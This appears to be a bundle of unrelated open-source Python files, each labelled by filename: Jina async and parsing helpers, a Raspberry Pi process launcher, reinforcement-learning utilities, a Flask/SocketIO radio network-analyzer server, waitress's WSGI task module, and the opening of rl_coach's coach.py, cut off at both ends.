return True # Jupyter notebook or qtconsole
elif shell == 'Shell':
return True # Google colab
elif shell == 'TerminalInteractiveShell':
return False # Terminal running IPython
else:
return False # Other type (?)
def iscoroutinefunction(func: Callable):
return inspect.iscoroutinefunction(func)
async def run_in_threadpool(func: Callable, executor=None, *args, **kwargs):
return await get_or_reuse_loop().run_in_executor(
executor, functools.partial(func, *args, **kwargs)
)
def run_async(func, *args, **kwargs):
"""Generalized asyncio.run for jupyter notebook.
When running inside jupyter, an eventloop is already exist, can't be stopped, can't be killed.
Directly calling asyncio.run will fail, as This function cannot be called when another asyncio event loop
is running in the same thread.
.. see_also:
https://stackoverflow.com/questions/55409641/asyncio-run-cannot-be-called-from-a-running-event-loop
call `run_async(my_function, any_event_loop=True, *args, **kwargs)` to enable run with any eventloop
:param func: function to run
:param args: parameters
:param kwargs: key-value parameters
:return: asyncio.run(func)
"""
any_event_loop = kwargs.pop('any_event_loop', False)
class _RunThread(threading.Thread):
"""Create a running thread when in Jupyter notebook."""
def run(self):
"""Run given `func` asynchronously."""
self.result = asyncio.run(func(*args, **kwargs))
try:
loop = asyncio.get_running_loop()
except RuntimeError:
loop = None
if loop and loop.is_running():
# eventloop already exist
# running inside Jupyter
if any_event_loop or is_jupyter():
thread = _RunThread()
thread.start()
thread.join()
try:
return thread.result
except AttributeError:
from jina.excepts import BadClient
raise BadClient(
'something wrong when running the eventloop, result can not be retrieved'
)
else:
raise RuntimeError(
'you have an eventloop running but not using Jupyter/ipython, '
'this may mean you are using Jina with other integration? if so, then you '
'may want to use Client/Flow(asyncio=True). If not, then '
'please report this issue here: https://github.com/jina-ai/jina'
)
else:
return get_or_reuse_loop().run_until_complete(func(*args, **kwargs))
def slugify(value):
"""
Normalize string, converts to lowercase, removes non-alpha characters, and converts spaces to hyphens.
:param value: Original string.
:return: Processed string.
"""
s = str(value).strip().replace(' ', '_')
return re.sub(r'(?u)[^-\w.]', '', s)
def is_yaml_filepath(val) -> bool:
"""
Check if the file is YAML file.
:param val: Path of target file.
:return: True if the file is YAML else False.
"""
if __windows__:
r = r'.*.ya?ml$' # TODO: might not be exhaustive
else:
r = r'^[/\w\-\_\.]+.ya?ml$'
return re.match(r, val.strip()) is not None
def download_mermaid_url(mermaid_url, output) -> None:
"""
Download the jpg image from mermaid_url.
:param mermaid_url: The URL of the image.
:param output: A filename specifying the name of the image to be created, the suffix svg/jpg determines the file type of the output image.
"""
from urllib.request import Request, urlopen
try:
req = Request(mermaid_url, headers={'User-Agent': 'Mozilla/5.0'})
with open(output, 'wb') as fp:
fp.write(urlopen(req).read())
except:
from jina.logging.predefined import default_logger
default_logger.error(
'can not download image, please check your graph and the network connections'
)
def find_request_binding(target):
"""Find `@request` decorated methods in a class.
:param target: the target class to check
:return: a dictionary with key as request type and value as method name
"""
import ast, inspect
from jina import __default_endpoint__
res = {}
def visit_function_def(node):
for e in node.decorator_list:
req_name = ''
if isinstance(e, ast.Call) and e.func.id == 'requests':
req_name = e.keywords[0].value.s
elif isinstance(e, ast.Name) and e.id == 'requests':
req_name = __default_endpoint__
if req_name:
if req_name in res:
raise ValueError(
f'you already bind `{res[req_name]}` with `{req_name}` request'
)
else:
res[req_name] = node.name
V = ast.NodeVisitor()
V.visit_FunctionDef = visit_function_def
V.visit(compile(inspect.getsource(target), '?', 'exec', ast.PyCF_ONLY_AST))
return res
def dunder_get(_dict: Any, key: str) -> Any:
"""Returns value for a specified dunderkey
A "dunderkey" is just a fieldname that may or may not contain
double underscores (dunderscores!) for referencing nested keys in
a dict. eg::
>>> data = {'a': {'b': 1}}
>>> dunder_get(data, 'a__b')
1
key 'b' can be referrenced as 'a__b'
:param _dict : (dict, list, struct or object) which we want to index into
:param key : (str) that represents a first level or nested key in the dict
:return: (mixed) value corresponding to the key
"""
try:
part1, part2 = key.split('__', 1)
except ValueError:
part1, part2 = key, ''
try:
part1 = int(part1) # parse int parameter
except ValueError:
pass
from google.protobuf.struct_pb2 import ListValue
from google.protobuf.struct_pb2 import Struct
if isinstance(part1, int):
result = _dict[part1]
elif isinstance(_dict, (dict, Struct, MutableMapping)):
if part1 in _dict:
result = _dict[part1]
else:
result = None
elif isinstance(_dict, (Iterable, ListValue)):
result = _dict[part1]
else:
result = getattr(_dict, part1)
return dunder_get(result, part2) if part2 else result
if TYPE_CHECKING:
from fastapi import FastAPI
def extend_rest_interface(app: 'FastAPI') -> 'FastAPI':
"""Extend Jina built-in FastAPI instance with customized APIs, routing, etc.
:param app: the built-in FastAPI instance given by Jina
:return: the extended FastAPI instance
.. highlight:: python
.. code-block:: python
def extend_rest_interface(app: 'FastAPI'):
@app.get('/extension1')
async def root():
return {"message": "Hello World"}
return app
"""
return app
def get_ci_vendor() -> Optional[str]:
from jina import __resources_path__
with open(os.path.join(__resources_path__, 'ci-vendors.json')) as fp:
all_cis = json.load(fp)
for c in all_cis:
if isinstance(c['env'], str) and c['env'] in os.environ:
return c['constant']
elif isinstance(c['env'], dict):
for k, v in c['env'].items():
if os.environ.get(k, None) == v:
return c['constant']
elif isinstance(c['env'], list):
for k in c['env']:
if k in os.environ:
return c['constant']
def deprecate_by(new_fn):
def _f(*args, **kwargs):
import inspect
old_fn_name = inspect.stack()[1][4][0].strip().split("=")[0].strip()
warnings.warn(
f'`{old_fn_name}` is renamed to `{new_fn.__name__}` with the same usage, please use the latter instead. '
f'The old function will be removed soon.',
DeprecationWarning,
)
return new_fn(*args, **kwargs)
return _f
def get_request_header() -> Dict:
"""Return the header of request.
:return: request header
"""
metas, envs = get_full_version()
header = {
**{f'jinameta-{k}': str(v) for k, v in metas.items()},
**envs,
}
return header
|
main.py
|
from multiprocessing import Process, Pipe
import integration
import cv
if __name__ == '__main__':
# Creating pipes to send data between two processes
parent_conn, child_conn = Pipe()
# GUI component receives data
p1 = Process(target=integration.main, args=(parent_conn,))
# CV component sends data
p2 = Process(target=cv.main, args=(child_conn,))
# Sets up both the compupter vision components and GUI windows to run in the Pi.
p1.start()
p2.start()
p1.join()
p2.join()
|
utils.py
|
import queue
import random
import socket
import time
from multiprocessing import Process
import gym
import numpy as np
import pyglet
from a2c.common.atari_wrappers import wrap_deepmind
from scipy.ndimage import zoom
# https://github.com/joschu/modular_rl/blob/master/modular_rl/running_stat.py
# http://www.johndcook.com/blog/standard_deviation/
class RunningStat(object):
def __init__(self, shape=()):
self._n = 0
self._M = np.zeros(shape)
self._S = np.zeros(shape)
def push(self, x):
x = np.asarray(x)
assert x.shape == self._M.shape
self._n += 1
if self._n == 1:
self._M[...] = x
else:
oldM = self._M.copy()
self._M[...] = oldM + (x - oldM)/self._n
self._S[...] = self._S + (x - oldM)*(x - self._M)
@property
def n(self):
return self._n
@property
def mean(self):
return self._M
@property
def var(self):
if self._n >= 2:
return self._S/(self._n - 1)
else:
return np.square(self._M)
@property
def std(self):
return np.sqrt(self.var)
@property
def shape(self):
return self._M.shape
# Based on SimpleImageViewer in OpenAI gym
class Im(object):
def __init__(self, display=None):
self.window = None
self.isopen = False
self.display = display
def imshow(self, arr):
if self.window is None:
height, width = arr.shape
self.window = pyglet.window.Window(
width=width, height=height, display=self.display)
self.width = width
self.height = height
self.isopen = True
assert arr.shape == (self.height, self.width), \
"You passed in an image with the wrong number shape"
image = pyglet.image.ImageData(self.width, self.height,
'L', arr.tobytes(), pitch=-self.width)
self.window.clear()
self.window.switch_to()
self.window.dispatch_events()
image.blit(0, 0)
self.window.flip()
def close(self):
if self.isopen:
self.window.close()
self.isopen = False
def __del__(self):
self.close()
class VideoRenderer:
play_through_mode = 0
restart_on_get_mode = 1
def __init__(self, vid_queue, mode, zoom=1, playback_speed=1):
assert mode == VideoRenderer.restart_on_get_mode or mode == VideoRenderer.play_through_mode
self.mode = mode
self.vid_queue = vid_queue
self.zoom_factor = zoom
self.playback_speed = playback_speed
self.proc = Process(target=self.render)
self.proc.start()
def stop(self):
self.proc.terminate()
def render(self):
v = Im()
frames = self.vid_queue.get(block=True)
t = 0
while True:
# Add a grey dot on the last line showing position
width = frames[t].shape[1]
fraction_played = t / len(frames)
x = int(fraction_played * width)
frames[t][-1][x] = 128
zoomed_frame = zoom(frames[t], self.zoom_factor)
v.imshow(zoomed_frame)
if self.mode == VideoRenderer.play_through_mode:
# Wait until having finished playing the current
# set of frames. Then, stop, and get the most
# recent set of frames.
t += self.playback_speed
if t >= len(frames):
frames = self.get_queue_most_recent()
t = 0
else:
time.sleep(1/60)
elif self.mode == VideoRenderer.restart_on_get_mode:
# Always try and get a new set of frames to show.
# If there is a new set of frames on the queue,
# restart playback with those frames immediately.
# Otherwise, just keep looping with the current frames.
try:
frames = self.vid_queue.get(block=False)
t = 0
except queue.Empty:
t = (t + self.playback_speed) % len(frames)
time.sleep(1/60)
def get_queue_most_recent(self):
# Make sure we at least get something
item = self.vid_queue.get(block=True)
while True:
try:
item = self.vid_queue.get(block=True, timeout=0.1)
except queue.Empty:
break
return item
def get_port_range(start_port, n_ports, random_stagger=False):
# If multiple runs try and call this function at the same time,
# the function could return the same port range.
# To guard against this, automatically offset the port range.
if random_stagger:
start_port += random.randint(0, 20) * n_ports
free_range_found = False
while not free_range_found:
ports = []
for port_n in range(n_ports):
port = start_port + port_n
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("127.0.0.1", port))
ports.append(port)
except socket.error as e:
if e.errno == 98 or e.errno == 48:
print("Warning: port {} already in use".format(port))
break
else:
raise e
finally:
s.close()
if len(ports) < n_ports:
# The last port we tried was in use
# Try again, starting from the next port
start_port = port + 1
else:
free_range_found = True
return ports
def profile_memory(log_path, pid):
import memory_profiler
def profile():
with open(log_path, 'w') as f:
# timeout=99999 is necessary because for external processes,
# memory_usage otherwise defaults to only returning a single sample
# Note that even with interval=1, because memory_profiler only
# flushes every 50 lines, we still have to wait 50 seconds before
# updates.
memory_profiler.memory_usage(pid, stream=f,
timeout=99999, interval=1)
p = Process(target=profile, daemon=True)
p.start()
return p
def batch_iter(data, batch_size, shuffle=False):
idxs = list(range(len(data)))
if shuffle:
np.random.shuffle(idxs) # in-place
start_idx = 0
end_idx = 0
while end_idx < len(data):
end_idx = start_idx + batch_size
if end_idx > len(data):
end_idx = len(data)
batch_idxs = idxs[start_idx:end_idx]
batch = []
for idx in batch_idxs:
batch.append(data[idx])
yield batch
start_idx += batch_size
def make_env(env_id, seed=0):
if env_id in ['MovingDot-v0', 'MovingDotDiscreteNoFrameskip-v0']:
import gym_moving_dot
env = gym.make(env_id)
env.seed(seed)
if env_id == 'EnduroNoFrameskip-v4':
from enduro_wrapper import EnduroWrapper
env = EnduroWrapper(env)
return wrap_deepmind(env)
|
sna.py
|
from __future__ import print_function
import time
import threading
from pyLMS7002Soapy import pyLMS7002Soapy as pyLMSS
from flask import Flask, request
from flask_socketio import SocketIO
import webbrowser
from SingleToneSweeper import SingleToneSweeper
class SNA:
RUN_MODE_OFF = 0
RUN_MODE_ON = 1
RUN_MODE_UPDATE_CONFIG = 2
thread = None
socketio = None
sweeper = None
snaRunMode = RUN_MODE_OFF
snaSampleRate = 20e6
snaStartFreq = 400e6
snaEndFreq = 500e6
snaNumSteps = 40
snaRxGain = 20
snaTxGain = 20
def __init__(self):
app = Flask(__name__, static_url_path='/static')
self.socketio = SocketIO(app, async_mode='gevent')
thread = threading.Thread(target=self.snaThread)
thread.start()
@app.route('/')
def root():
return app.send_static_file('index.html')
@self.socketio.on('connect')
def connect():
self.socketio.emit('config', {
'sampleRate': self.snaSampleRate,
'startFreq': self.snaStartFreq,
'endFreq': self.snaEndFreq,
'numSteps': self.snaNumSteps,
'rxGain': self.snaRxGain,
'txGain': self.snaTxGain,
'runMode': self.snaRunMode
})
@self.socketio.on('config')
def handle_json(json):
self.snaSampleRate = int(json['sampleRate'])
self.snaStartFreq = int(json['startFreq'])
self.snaEndFreq = int(json['endFreq'])
self.snaNumSteps = int(json['numSteps'])
self.snaRxGain = int(json['rxGain'])
self.snaTxGain = int(json['txGain'])
self.snaRunMode = int(json['runMode'])
if ((self.snaRunMode!=self.RUN_MODE_ON) and (self.sweeper is not None)):
self.sweeper.abortSweep()
self.socketio.run(app, port=55555)
def sweepStart(self, startFreq, freqStep, stepCnt):
self.socketio.emit('sweepStart', {
'freqMin': startFreq,
'freqStep': freqStep,
'stepCnt': stepCnt
})
def sweepResult(self, index, pwr):
self.socketio.emit('data', {
'x': index,
'y': pwr
})
self.socketio.sleep(0)
def snaThread(self):
radio = pyLMSS.pyLMS7002Soapy(0)
self.sweeper = SingleToneSweeper(radio, self)
webbrowser.open("http://127.0.0.1:55555", new=1)
while True:
if (self.snaRunMode==self.RUN_MODE_OFF):
time.sleep(0.1)
continue
elif (self.snaRunMode==self.RUN_MODE_UPDATE_CONFIG):
self.snaRunMode = self.RUN_MODE_ON
start = time.time()
self.sweeper.setGain(self.snaRxGain, self.snaTxGain)
self.sweeper.setSampleRate(self.snaSampleRate)
self.sweeper.sweep(self.snaStartFreq, self.snaEndFreq, self.snaNumSteps)
end = time.time()
print(end - start)
if __name__ == '__main__':
SNA()
|
task.py
|
##############################################################################
#
# Copyright (c) 2001, 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
import socket
import sys
import threading
import time
from collections import deque
from .buffers import ReadOnlyFileBasedBuffer
from .compat import reraise, tobytes
from .utilities import build_http_date, logger, queue_logger
rename_headers = { # or keep them without the HTTP_ prefix added
"CONTENT_LENGTH": "CONTENT_LENGTH",
"CONTENT_TYPE": "CONTENT_TYPE",
}
hop_by_hop = frozenset(
(
"connection",
"keep-alive",
"proxy-authenticate",
"proxy-authorization",
"te",
"trailers",
"transfer-encoding",
"upgrade",
)
)
class ThreadedTaskDispatcher(object):
"""A Task Dispatcher that creates a thread for each task.
"""
stop_count = 0 # Number of threads that will stop soon.
active_count = 0 # Number of currently active threads
logger = logger
queue_logger = queue_logger
def __init__(self):
self.threads = set()
self.queue = deque()
self.lock = threading.Lock()
self.queue_cv = threading.Condition(self.lock)
self.thread_exit_cv = threading.Condition(self.lock)
def start_new_thread(self, target, thread_no):
t = threading.Thread(
target=target, name="waitress-{}".format(thread_no), args=(thread_no,)
)
t.daemon = True
t.start()
def handler_thread(self, thread_no):
while True:
with self.lock:
while not self.queue and self.stop_count == 0:
# Mark ourselves as idle before waiting to be
# woken up, then we will once again be active
self.active_count -= 1
self.queue_cv.wait()
self.active_count += 1
if self.stop_count > 0:
self.active_count -= 1
self.stop_count -= 1
self.threads.discard(thread_no)
self.thread_exit_cv.notify()
break
task = self.queue.popleft()
try:
task.service()
except BaseException:
self.logger.exception("Exception when servicing %r", task)
def set_thread_count(self, count):
with self.lock:
threads = self.threads
thread_no = 0
running = len(threads) - self.stop_count
while running < count:
# Start threads.
while thread_no in threads:
thread_no = thread_no + 1
threads.add(thread_no)
running += 1
self.start_new_thread(self.handler_thread, thread_no)
self.active_count += 1
thread_no = thread_no + 1
if running > count:
# Stop threads.
self.stop_count += running - count
self.queue_cv.notify_all()
def add_task(self, task):
with self.lock:
self.queue.append(task)
self.queue_cv.notify()
queue_size = len(self.queue)
idle_threads = len(self.threads) - self.stop_count - self.active_count
if queue_size > idle_threads:
self.queue_logger.warning(
"Task queue depth is %d", queue_size - idle_threads
)
def shutdown(self, cancel_pending=True, timeout=5):
self.set_thread_count(0)
# Ensure the threads shut down.
threads = self.threads
expiration = time.time() + timeout
with self.lock:
while threads:
if time.time() >= expiration:
self.logger.warning("%d thread(s) still running", len(threads))
break
self.thread_exit_cv.wait(0.1)
if cancel_pending:
# Cancel remaining tasks.
queue = self.queue
if len(queue) > 0:
self.logger.warning("Canceling %d pending task(s)", len(queue))
while queue:
task = queue.popleft()
task.cancel()
self.queue_cv.notify_all()
return True
return False
class Task(object):
close_on_finish = False
status = "200 OK"
wrote_header = False
start_time = 0
content_length = None
content_bytes_written = 0
logged_write_excess = False
logged_write_no_body = False
complete = False
chunked_response = False
logger = logger
def __init__(self, channel, request):
self.channel = channel
self.request = request
self.response_headers = []
version = request.version
if version not in ("1.0", "1.1"):
# fall back to a version we support.
version = "1.0"
self.version = version
def service(self):
try:
try:
self.start()
self.execute()
self.finish()
except socket.error:
self.close_on_finish = True
if self.channel.adj.log_socket_errors:
raise
finally:
pass
@property
def has_body(self):
return not (
self.status.startswith("1")
or self.status.startswith("204")
or self.status.startswith("304")
)
def build_response_header(self):
version = self.version
# Figure out whether the connection should be closed.
connection = self.request.headers.get("CONNECTION", "").lower()
response_headers = []
content_length_header = None
date_header = None
server_header = None
connection_close_header = None
for (headername, headerval) in self.response_headers:
headername = "-".join([x.capitalize() for x in headername.split("-")])
if headername == "Content-Length":
if self.has_body:
content_length_header = headerval
else:
continue # pragma: no cover
if headername == "Date":
date_header = headerval
if headername == "Server":
server_header = headerval
if headername == "Connection":
connection_close_header = headerval.lower()
# replace with properly capitalized version
response_headers.append((headername, headerval))
if (
content_length_header is None
and self.content_length is not None
and self.has_body
):
content_length_header = str(self.content_length)
response_headers.append(("Content-Length", content_length_header))
def close_on_finish():
if connection_close_header is None:
response_headers.append(("Connection", "close"))
self.close_on_finish = True
if version == "1.0":
if connection == "keep-alive":
if not content_length_header:
close_on_finish()
else:
response_headers.append(("Connection", "Keep-Alive"))
else:
close_on_finish()
elif version == "1.1":
if connection == "close":
close_on_finish()
if not content_length_header:
# RFC 7230: MUST NOT send Transfer-Encoding or Content-Length
# for any response with a status code of 1xx, 204 or 304.
if self.has_body:
response_headers.append(("Transfer-Encoding", "chunked"))
self.chunked_response = True
if not self.close_on_finish:
close_on_finish()
# under HTTP 1.1 keep-alive is default, no need to set the header
else:
raise AssertionError("neither HTTP/1.0 or HTTP/1.1")
# Set the Server and Date field, if not yet specified. This is needed
# if the server is used as a proxy.
ident = self.channel.server.adj.ident
if not server_header:
if ident:
response_headers.append(("Server", ident))
else:
response_headers.append(("Via", ident or "waitress"))
if not date_header:
response_headers.append(("Date", build_http_date(self.start_time)))
self.response_headers = response_headers
first_line = "HTTP/%s %s" % (self.version, self.status)
# NB: sorting headers needs to preserve same-named-header order
# as per RFC 2616 section 4.2; thus the key=lambda x: x[0] here;
# rely on stable sort to keep relative position of same-named headers
next_lines = [
"%s: %s" % hv for hv in sorted(self.response_headers, key=lambda x: x[0])
]
lines = [first_line] + next_lines
res = "%s\r\n\r\n" % "\r\n".join(lines)
return tobytes(res)
def remove_content_length_header(self):
response_headers = []
for header_name, header_value in self.response_headers:
if header_name.lower() == "content-length":
continue # pragma: nocover
response_headers.append((header_name, header_value))
self.response_headers = response_headers
def start(self):
self.start_time = time.time()
def finish(self):
if not self.wrote_header:
self.write(b"")
if self.chunked_response:
# not self.write, it will chunk it!
self.channel.write_soon(b"0\r\n\r\n")
def write(self, data):
if not self.complete:
raise RuntimeError("start_response was not called before body written")
channel = self.channel
if not self.wrote_header:
rh = self.build_response_header()
channel.write_soon(rh)
self.wrote_header = True
if data and self.has_body:
towrite = data
cl = self.content_length
if self.chunked_response:
# use chunked encoding response
towrite = tobytes(hex(len(data))[2:].upper()) + b"\r\n"
towrite += data + b"\r\n"
elif cl is not None:
towrite = data[: cl - self.content_bytes_written]
self.content_bytes_written += len(towrite)
if towrite != data and not self.logged_write_excess:
self.logger.warning(
"application-written content exceeded the number of "
"bytes specified by Content-Length header (%s)" % cl
)
self.logged_write_excess = True
if towrite:
channel.write_soon(towrite)
elif data:
# Cheat, and tell the application we have written all of the bytes,
# even though the response shouldn't have a body and we are
# ignoring it entirely.
self.content_bytes_written += len(data)
if not self.logged_write_no_body:
self.logger.warning(
"application-written content was ignored due to HTTP "
"response that may not contain a message-body: (%s)" % self.status
)
self.logged_write_no_body = True
class ErrorTask(Task):
""" An error task produces an error response
"""
complete = True
def execute(self):
e = self.request.error
status, headers, body = e.to_response()
self.status = status
self.response_headers.extend(headers)
# We need to explicitly tell the remote client we are closing the
# connection, because self.close_on_finish is set, and we are going to
# slam the door in the clients face.
self.response_headers.append(("Connection", "close"))
self.close_on_finish = True
self.content_length = len(body)
self.write(tobytes(body))
class WSGITask(Task):
"""A WSGI task produces a response from a WSGI application.
"""
environ = None
def execute(self):
environ = self.get_environment()
def start_response(status, headers, exc_info=None):
if self.complete and not exc_info:
raise AssertionError(
"start_response called a second time without providing exc_info."
)
if exc_info:
try:
if self.wrote_header:
# higher levels will catch and handle raised exception:
# 1. "service" method in task.py
# 2. "service" method in channel.py
# 3. "handler_thread" method in task.py
reraise(exc_info[0], exc_info[1], exc_info[2])
else:
# As per WSGI spec existing headers must be cleared
self.response_headers = []
finally:
exc_info = None
self.complete = True
if not status.__class__ is str:
raise AssertionError("status %s is not a string" % status)
if "\n" in status or "\r" in status:
raise ValueError(
"carriage return/line feed character present in status"
)
self.status = status
# Prepare the headers for output
for k, v in headers:
if not k.__class__ is str:
raise AssertionError(
"Header name %r is not a string in %r" % (k, (k, v))
)
if not v.__class__ is str:
raise AssertionError(
"Header value %r is not a string in %r" % (v, (k, v))
)
if "\n" in v or "\r" in v:
raise ValueError(
"carriage return/line feed character present in header value"
)
if "\n" in k or "\r" in k:
raise ValueError(
"carriage return/line feed character present in header name"
)
kl = k.lower()
if kl == "content-length":
self.content_length = int(v)
elif kl in hop_by_hop:
raise AssertionError(
'%s is a "hop-by-hop" header; it cannot be used by '
"a WSGI application (see PEP 3333)" % k
)
self.response_headers.extend(headers)
# Return a method used to write the response data.
return self.write
# Call the application to handle the request and write a response
app_iter = self.channel.server.application(environ, start_response)
can_close_app_iter = True
try:
if app_iter.__class__ is ReadOnlyFileBasedBuffer:
cl = self.content_length
size = app_iter.prepare(cl)
if size:
if cl != size:
if cl is not None:
self.remove_content_length_header()
self.content_length = size
self.write(b"") # generate headers
# if the write_soon below succeeds then the channel will
# take over closing the underlying file via the channel's
# _flush_some or handle_close so we intentionally avoid
# calling close in the finally block
self.channel.write_soon(app_iter)
can_close_app_iter = False
return
first_chunk_len = None
for chunk in app_iter:
if first_chunk_len is None:
first_chunk_len = len(chunk)
# Set a Content-Length header if one is not supplied.
# start_response may not have been called until first
# iteration as per PEP, so we must reinterrogate
# self.content_length here
if self.content_length is None:
app_iter_len = None
if hasattr(app_iter, "__len__"):
app_iter_len = len(app_iter)
if app_iter_len == 1:
self.content_length = first_chunk_len
# transmit headers only after first iteration of the iterable
# that returns a non-empty bytestring (PEP 3333)
if chunk:
self.write(chunk)
cl = self.content_length
if cl is not None:
if self.content_bytes_written != cl:
# close the connection so the client isn't sitting around
# waiting for more data when there are too few bytes
# to service content-length
self.close_on_finish = True
if self.request.command != "HEAD":
self.logger.warning(
"application returned too few bytes (%s) "
"for specified Content-Length (%s) via app_iter"
% (self.content_bytes_written, cl),
)
finally:
if can_close_app_iter and hasattr(app_iter, "close"):
app_iter.close()
def get_environment(self):
"""Returns a WSGI environment."""
environ = self.environ
if environ is not None:
# Return the cached copy.
return environ
request = self.request
path = request.path
channel = self.channel
server = channel.server
url_prefix = server.adj.url_prefix
if path.startswith("/"):
# strip extra slashes at the beginning of a path that starts
# with any number of slashes
path = "/" + path.lstrip("/")
if url_prefix:
# NB: url_prefix is guaranteed by the configuration machinery to
# be either the empty string or a string that starts with a single
# slash and ends without any slashes
if path == url_prefix:
# if the path is the same as the url prefix, the SCRIPT_NAME
# should be the url_prefix and PATH_INFO should be empty
path = ""
else:
# if the path starts with the url prefix plus a slash,
# the SCRIPT_NAME should be the url_prefix and PATH_INFO should
# the value of path from the slash until its end
url_prefix_with_trailing_slash = url_prefix + "/"
if path.startswith(url_prefix_with_trailing_slash):
path = path[len(url_prefix) :]
environ = {
"REMOTE_ADDR": channel.addr[0],
# Nah, we aren't actually going to look up the reverse DNS for
# REMOTE_ADDR, but we will happily set this environment variable
# for the WSGI application. Spec says we can just set this to
# REMOTE_ADDR, so we do.
"REMOTE_HOST": channel.addr[0],
# try and set the REMOTE_PORT to something useful, but maybe None
"REMOTE_PORT": str(channel.addr[1]),
"REQUEST_METHOD": request.command.upper(),
"SERVER_PORT": str(server.effective_port),
"SERVER_NAME": server.server_name,
"SERVER_SOFTWARE": server.adj.ident,
"SERVER_PROTOCOL": "HTTP/%s" % self.version,
"SCRIPT_NAME": url_prefix,
"PATH_INFO": path,
"QUERY_STRING": request.query,
"wsgi.url_scheme": request.url_scheme,
# the following environment variables are required by the WSGI spec
"wsgi.version": (1, 0),
# apps should use the logging module
"wsgi.errors": sys.stderr,
"wsgi.multithread": True,
"wsgi.multiprocess": False,
"wsgi.run_once": False,
"wsgi.input": request.get_body_stream(),
"wsgi.file_wrapper": ReadOnlyFileBasedBuffer,
"wsgi.input_terminated": True, # wsgi.input is EOF terminated
}
for key, value in dict(request.headers).items():
value = value.strip()
mykey = rename_headers.get(key, None)
if mykey is None:
mykey = "HTTP_" + key
if mykey not in environ:
environ[mykey] = value
# cache the environ for this request
self.environ = environ
return environ
|
coach.py
|
# Copyright (c) 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
sys.path.append('.')
import copy
from configparser import ConfigParser, Error
from rl_coach.core_types import EnvironmentSteps
import os
from rl_coach import logger
import traceback
from rl_coach.logger import screen, failed_imports
import argparse
import atexit
import time
import sys
import json
from rl_coach.base_parameters import Frameworks, VisualizationParameters, TaskParameters, DistributedTaskParameters, \
RunType, DistributedCoachSynchronizationType
from multiprocessing import Process
from multiprocessing.managers import BaseManager
import subprocess
from rl_coach.graph_managers.graph_manager import HumanPlayScheduleParameters, GraphManager
from rl_coach.utils import list_all_presets, short_dynamic_import, get_open_port, SharedMemoryScratchPad, get_base_dir
from rl_coach.graph_managers.basic_rl_graph_manager import BasicRLGraphManager
from rl_coach.environments.environment import SingleLevelSelection
from rl_coach.memories.backend.redis import RedisPubSubMemoryBackendParameters
from rl_coach.memories.backend.memory_impl import construct_memory_params
from rl_coach.data_stores.data_store import DataStoreParameters
from rl_coach.data_stores.s3_data_store import S3DataStoreParameters
from rl_coach.data_stores.nfs_data_store import NFSDataStoreParameters
from rl_coach.data_stores.data_store_impl import get_data_store, construct_data_store_params
from rl_coach.training_worker import training_worker
from rl_coach.rollout_worker import rollout_worker, wait_for_checkpoint
if len(set(failed_imports)) > 0:
screen.warning("Warning: failed to import the following packages - {}".format(', '.join(set(failed_imports))))
def add_items_to_dict(target_dict, source_dict):
updated_task_parameters = copy.copy(source_dict)
updated_task_parameters.update(target_dict)
return updated_task_parameters
def open_dashboard(experiment_path):
"""
open X11 based dashboard in a new process (nonblocking)
"""
dashboard_path = 'python {}/dashboard.py'.format(get_base_dir())
cmd = "{} --experiment_dir {}".format(dashboard_path, experiment_path)
screen.log_title("Opening dashboard - experiment path: {}".format(experiment_path))
# subprocess.Popen(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, shell=True, executable="/bin/bash")
subprocess.Popen(cmd, shell=True, executable="/bin/bash")
def start_graph(graph_manager: 'GraphManager', task_parameters: 'TaskParameters'):
"""
Runs the graph_manager using the configured task_parameters.
This stand-alone method is a convenience for multiprocessing.
"""
graph_manager.create_graph(task_parameters)
# let the adventure begin
if task_parameters.evaluate_only is not None:
steps_to_evaluate = task_parameters.evaluate_only if task_parameters.evaluate_only > 0 \
else sys.maxsize
graph_manager.evaluate(EnvironmentSteps(steps_to_evaluate))
else:
graph_manager.improve()
graph_manager.close()
def handle_distributed_coach_tasks(graph_manager, args, task_parameters):
ckpt_inside_container = "/checkpoint"
memory_backend_params = None
if args.memory_backend_params:
memory_backend_params = json.loads(args.memory_backend_params)
memory_backend_params['run_type'] = str(args.distributed_coach_run_type)
graph_manager.agent_params.memory.register_var('memory_backend_params', construct_memory_params(memory_backend_params))
data_store_params = None
if args.data_store_params:
data_store_params = construct_data_store_params(json.loads(args.data_store_params))
data_store_params.expt_dir = args.experiment_path
data_store_params.checkpoint_dir = ckpt_inside_container
graph_manager.data_store_params = data_store_params
if args.distributed_coach_run_type == RunType.TRAINER:
task_parameters.checkpoint_save_dir = ckpt_inside_container
training_worker(
graph_manager=graph_manager,
task_parameters=task_parameters,
is_multi_node_test=args.is_multi_node_test
)
if args.distributed_coach_run_type == RunType.ROLLOUT_WORKER:
task_parameters.checkpoint_restore_dir = ckpt_inside_container
data_store = None
if args.data_store_params:
data_store = get_data_store(data_store_params)
rollout_worker(
graph_manager=graph_manager,
data_store=data_store,
num_workers=args.num_workers,
task_parameters=task_parameters
)
def handle_distributed_coach_orchestrator(args):
from rl_coach.orchestrators.kubernetes_orchestrator import KubernetesParameters, Kubernetes, \
RunTypeParameters
ckpt_inside_container = "/checkpoint"
arg_list = sys.argv[1:]
try:
i = arg_list.index('--distributed_coach_run_type')
arg_list.pop(i)
arg_list.pop(i)
except ValueError:
pass
trainer_command = ['python3', 'rl_coach/coach.py', '--distributed_coach_run_type', str(RunType.TRAINER)] + arg_list
rollout_command = ['python3', 'rl_coach/coach.py', '--distributed_coach_run_type', str(RunType.ROLLOUT_WORKER)] + arg_list
if '--experiment_name' not in rollout_command:
rollout_command = rollout_command + ['--experiment_name', args.experiment_name]
